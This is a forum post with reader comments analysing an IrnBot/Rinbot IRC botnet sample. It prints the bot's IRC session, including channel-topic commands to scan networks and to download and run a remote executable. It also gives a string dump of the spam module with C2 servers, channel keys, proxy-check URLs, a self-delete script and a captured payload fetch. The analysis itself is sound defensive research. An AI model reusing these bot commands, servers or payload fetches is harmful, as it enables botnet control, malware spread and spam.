Skip navigation.
Home

New IrnBot / Rinbot pokes at Offensive Computing

IrnBot is getting more personal it seems.

The bot does the following depending what server its on:
JOIN ##OC hellovalsmit

I guess he's a fan of the site? Why not contribute positively here instead of making a bunch of negative malware?

You'll notice the irc channel name is #OC and the leet speak spelling of OffensiveComputing.
I guess the malware author is a fan of our site? :) Or maybe we will see an Anti Offensive Computing Rant similar to the symantec / cnn one ?

I joined up to his irc server and it redirected me to a channel called #bye and the kick / banned me from the server but not before I saw the nick "bshfcker".

NICK [XP|USA|P|01|ieUcIXxu]
USER XP-USA 0 0 :[XP|USA|P|01|ieUcIXxu]
:s010.xnet.net NOTICE AUTH :*** Looking up your hostname...
:s010.xnet.net NOTICE AUTH :*** Found your hostname
:s010.xnet.net NOTICE [XP|USA|P|01|ieUcIXxu] :*** If you are having problems connecting due to ping timeouts, please type /quote pong D3B1FDB3 or /raw pong D3B1FDB3 now.
PING :D3B1FDB3
PONG :D3B1FDB3
:s010.xnet.net 001 [XP|USA|P|01|ieUcIXxu] :Welcome to the xnet IRC Network [XP|USA|P|01|ieUcIXxu]!XP-USA@
:s010.xnet.net 002 [XP|USA|P|01|ieUcIXxu] :Your host is s010.xnet.net, running version Unreal3.2.5
:s010.xnet.net 003 [XP|USA|P|01|ieUcIXxu] :This server was created Sat Feb 25 19:37:48 2006
:s010.xnet.net 004 [XP|USA|P|01|ieUcIXxu] s010.xnet.net Unreal3.2.5 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:s010.xnet.net 005 [XP|USA|P|01|ieUcIXxu] NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
:s010.xnet.net 005 [XP|USA|P|01|ieUcIXxu] WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=xnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:s010.xnet.net 005 [XP|USA|P|01|ieUcIXxu] CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
MODE [XP|USA|P|01|ieUcIXxu] -x
JOIN ##OC hellovalsmit

:s013.xnet.net 332 [XP|USA|P|00|suqbIHLe] ##OC :.scan.stop
- -s;.scan.start N 30 -s;.scan.start N 30 -a -s;.scan.start N x.x.x.x 30
- -s;.scan.start M 15 -a -s;.scan.start M 15 -s;.scan.start M x.x.x.x 15
- -s;.scan.start S 15 -a -s;.scan.start S 15 -s;.scan.start S x.x.x.x 15
- -s;.download Off3ns1v3C0mputingD0wnload http://210.22.13.118/MS.exe
c:\m.exe -e -s

Notice also:

:s010.xnet.net NOTICE [XP|USA|P|01|ieUcIXxu] :*** If you are having problems connecting due to ping timeouts, please type /quote pong D3B1FDB3 or /raw pong D3B1FDB3 now.
PING :D3B1FDB3
PONG :D3B1FDB3

If you decode this hex its 211.177.253.179 (im guessing its an IP so I added the dots) and the IP is in Seoul, Korea. I dont know if this is right.

I thought this was funny:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Zone Alarm Security
C:\WINDOWS\system32\zlcint.exe

Seems like it has added VMWare detection to its anti analysis bag of tricks, but disabling acceleration in vmware takes care of this issue.

Ive unpacked it and the contents seem very similar.

Opens ports on 4736 TCP 56002 TCP and 69 UDP (the fi7rst two are probably random)

drops C\WINDOWS\system32\zlclint.exe and c:\WINDOWS\lsasrv.exe

Inside lsasrv.exe

http//ww.spamhaus.org/query/blip
is listed in the
http//ww.filesdatabase.com/azenv.php
http//ww.internetsec.org/azenv.php
http//kasupke.redio.de/azenv.php
http//ww.proxy.us.pl/azenv.php
http//anonymousjudge.noip.org/azenv.php

IrcConnect
sdelsvc.cmd
2 goto repeat2
repeat2
1 goto repeat
repeat
comspec
SYSTEM\CurrentControlSet\Services\s
Start
ImagePath
ServicesActive
dnsapi.dll
DnsQuery_A
DnsRecordListFree
DnsQueryConfig
u.u.u.u.INADDR.ARPA
smtp.send
smtp.init
smtp.stop
.smtp. stopped current task.
.smtp. failed to stop, not running.
IrcRead
mx.sbn01.to
cbiz
csend
ircd.myadv.biz
mail.ru
lsasrv.exe
s/getMail.phpid
mails.queue
.smtp. failed to initialise mails.queue.
.smtp. no active campaign.
stim
s/getTemplate.phpid
s/getTemplate.phpid
.smtp. failed to initialise body.plain.
s/getTemplate.phpid
.smtp. failed to initialise body.html.
sthe
s/getTemplate.phpid
.smtp. failed to initialise headers.mail.
s mails
.smtp. initialised project
.smtp. failed to initialise config.
.download. saved
.smtp. stopped mailing.
spamhaus.org.
.smtp. failed to initialise rbl
s connection failed.
.smtp. failed to initialise mx
.smtp. initialised SMTP domain
s helo
MessageID
From
ReplyTo
Subject s
Date s
NextPart
_s_.3u_.4u_.8X..8X
boundary
multipart/alternative
type
headers.mail
boundary
charset
body.plain
charset
body.html
ContentID
name

contacts

File: lsasrv_dmp.exe_
MD5: 030e05998229174c4987b3ebaa31254d
Size: 372738

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
$x79
$y7D$x79
$x7T
$x79
$x7Rich
QUIT
--%s
Content-Type: image/%s;
name="%s.%s"
Content-Transfer-Encoding: base64
Content-ID:
image.b64
--%s--
body.html
--%s
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
body.plain
--%s
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--%s
Content-Type: multipart/alternative;
boundary="%s"
This is a multi-part message in MIME format.
headers.mail
Content-Type: multipart/related;
type="multipart/alternative";
boundary="%s"
----=_%s_%.3u_%.4u_%.8X.%.8X
NextPart
MIME-Version: 1.0
Date: %s
Subject: %s
To: "%s"
Reply-To:
From: "%s"
Message-ID:
Received: from %s ([%s] helo=%s)
by %s with smtp
id %s
for %s; %s
DATA
RCPT TO:
MAIL FROM:
PRIVMSG %s :>> .[smtp]. initialised SMTP: (domain): "%s" (mx): "%s".
JOIN %s %s
PRIVMSG %s :>> .[smtp]. failed to initialise: (mx): "%s" connection failed.
PRIVMSG %s :>> .[smtp]. failed to initialise: (rbl): "spamhaus.org".
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
%s %s
PRIVMSG %s :>> .[smtp]. stopped mailing.
SMTPd
_IMAGE_ID_
HELO %s
EHLO %s
http://
PRIVMSG %s :>> .[download]. (saved): "%s" (to): "%s"
) v1.0b
%s?v=a
SMTPi
PRIVMSG %s :>> .[smtp]. failed to initialise config.
PRIVMSG %s :>> .[smtp]. initialised (project): "%s" (url): "%s" (mails): "%d".
PRIVMSG %s :>> .[smtp]. failed to initialise: "headers.mail".
%s/getTemplate.php?id=%s&t=he
PRIVMSG %s :>> .[smtp]. failed to initialise: "body.html".
%s/getTemplate.php?id=%s&t=ht
PRIVMSG %s :>> .[smtp]. failed to initialise: "body.plain".
%s/getTemplate.php?id=%s&t=tx
%s/getTemplate.php?id=%s&t=im
PRIVMSG %s :>> .[smtp]. no active campaign.
PRIVMSG %s :>> .[smtp]. failed to initialise: "mails.queue".
mails.queue
%s/getMail.php?id=%s
%s?v=a&s=1
lsasrv.exe
a89bb382bbad8aa85b08f65ba0ffa574
LSA Server
Local Security Authority Subsystem Library
Responsible for enforcing the security policy on the system.
mail.ru
81.93.100.123
ircd.myadv.biz
4n0th3rk3y
#csend#
#cbiz#
s0m3k3y
mx.sbn01.to
IrcRead
USER %s %s %s :%s
NICK %s
ERROR
KICK
PONG %s
PING
PART
JOIN
QUIT
TOPIC
MODE
PRIVMSG %s :>> .[smtp]. failed to stop, not running.
PRIVMSG %s :>> .[smtp]. stopped current task.
+smtp.stop
+smtp.init
+smtp.send
http
%u.%u.%u.%u.IN-ADDR.ARPA
DnsQueryConfig
DnsRecordListFree
DnsQuery_A
dnsapi.dll
%02.2x
ServicesActive
ImagePath
Start
SYSTEM\CurrentControlSet\Services\%s
SYSTEM
%%comspec%% /c %s %s %s
@echo off
:repeat
del "%%1"
if exist "%%1" goto repeat
:repeat2
del "%%2"
if exist "%%2" goto repeat2
%sdelsvc.cmd
%s%s
IrcConnect
http://anonymous-judge.no-ip.org/azenv.php
http://www.proxy.us.pl/azenv.php
http://kasupke.redio.de/azenv.php
http://www.internetsec.org/azenv.php
REMOTE_ADDR =
http://www.filesdatabase.com/azenv.php
is listed in the
http://www.spamhaus.org/query/bl?ip=%s

x.anti-viral.us
www.filesdatabase.com
90.95.121.65.IN-ADDR.ARPA
mx.sbn01.to
is.wayne.brady.gonna.have.to.chokeabitch.us
x.rofflewaffles.us
x.anti-viral.us
is.wayne.brady.gonna.have.to.chokeabitch.us

gets http//217.67.229.212/phpbb/uploads/jpb.exeC\jpb.exe

-> 217.67.229.212:80
GET /phpbb/uploads/jpb.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: 217.67.229.212

---------------------------------------------------------------------------
+ZïÔ+cœAaUK~,ð+Ó³”Òe>E}#Vßît³E!¿òÆ
1ê˘˜–¾1ë)o&³ày¥ªÎ›Ù `·°ÌŒüp"c™í“û$ÇËPfýj >O ‚š¬AÊ 0±ý;òíÆ÷#Øc0„iƒæÂ
I‰-³ãš3(Û¹ëÜ®Ar¥J£bbb l–ƒú!çRû@:I2=2à ˜tè ¶Å¬å¯¯&´vr˜0Mòe»Ýìe†#I3a¢¼ŸùŽãàõÅ$^.®KLJ†!ð”Þ,›ƒæù9
/¡Càê5ÃG/ò/{¯f`×ÇÑmú¥¡¦ íO)ÁFö~H)Éœ¾Þ¬öDü’h}ð´¾6ï鮀Â6xhâ8>BC@+)X‘‹`O
¶ÍÐ…J+¹ ¨OŽ”’@eeÚã#ßÏ|ØÆ'Ôv“dŠÚñ‘–Óî ó¾J
sÍ JýR©)b¶-éû(^DËE
èÕ¦n0¢5Qñ±ˆ £b[¸_-ŒÉé«äwb7é$qÃE#ZÚ*M®`‰õ‹u6mCí„Ï5$ܬ¸Ø¾¶S®¼Æ^ÇÒà…kú8#Ù1™'·$³«âGRæùxÂ#Ê#P>ÃaN¢tK@ηåà Öü}Œ}tä=Où±ÿÔy(Olc¸÷éÂ#)óy6Jà ÞÛ”•>ɳ•£h?9=ú¶ü U½G,fÊfa &¿+vûe'àÔuAæK‹˜XsïÌ'^ôMœ
¦×I±Tß^fèk¨wà®ðo@K
UAÿÝR0¶˜‘·~º}X÷{êæ‹]€ŒYëvi75dvíµ°´âŠ½4‘Õûz”·6/í#AZU¢fM°ŠÌÍMÕ²·¤>È¥}Ò{ n_“[úïK–~Õp!Zý+疝†jÀxMʱ6Š¸¶Êð±ÑDp K_q8RªVã* ôE£Æ„ô|ÕìPšDI
ì¼è´‡›vÌ›'5|â~káà›îtÞ}%dÛ©ox¤Ù†è²4ëÉ$g1eÔ/^}€Ó~ugŽ|z&09š¼ö Óù»i¤v¦F@®Ú¾^®‹£ûò·-çݧã_“"½ÏÓ€è¬J¥Ôýªï“2èåÕŒ\ÕˆŽ
Ù8&œ]¸æ¦+|ä;¢_ᓘÝ 4)!Ý3…Æ”þg85æÁ2Û|Ê$Â"à?Ï ®Ùøíö&WÞœåšî®´U¯«q÷žÂ"NñŽ²K:¼9½O¼â7 ½ æ¢3,¾Ý‡‚#{‘}ァ‘× 207.210.95.154:80
GET /azenv.php HTTP/1.0
Host: www.filesdatabase.com
Pragma: no-cache

---------------------------------------------------------------------------

AZ Environment variables 1.04


---------------------------------------------------------------------------



---------------------------------------------------------------------------



81.93.100.123 : 6019


USER [XP|L|USA|00]-owaiaehx [XP|L|USA|00]-owaiaehx [XP|L|USA|00]-owaiaehx :XPWORK
NICK [XP|L|USA|00]-owaiaehx
:03.main.ru 001 [XP|L|USA|00]-owaiaehx :Cisco          
:03.main.ru 005 [XP|L|USA|00]-owaiaehx                                                                                                                                          
                                                                                                                                                                          
:03.main.ru 422 [XP|L|USA|00]-owaiaehx :                    
:[XP|L|USA|00]-owaiaehx MODE [XP|L|USA|00]-owaiaehx :+i
JOIN #c s0m3k3y
:[XP|L|USA|00]-owaiaehx!~XPLUSA@poo-tee-weet JOIN :#c
:03.main.ru 332 [XP|L|USA|00]-owaiaehx #c :+
:03.main.ru 333 [XP|L|USA|00]-owaiaehx #c bshfkgn 1173304447
:03.main.ru 353 [XP|L|USA|00]-owaiaehx @ #c :[XP|L|USA|00]-owaiaehx 
:03.main.ru 366 [XP|L|USA|00]-owaiaehx #c :End of /NAMES list.
PING :03.main.ru
PONG :03.main.ru

Not very stealthy

also

thanks for finding that zone alarm registry key chamuco, it was killing my regmon.

V.

download

Where is the link to download this?

Thanks

John

Here is the link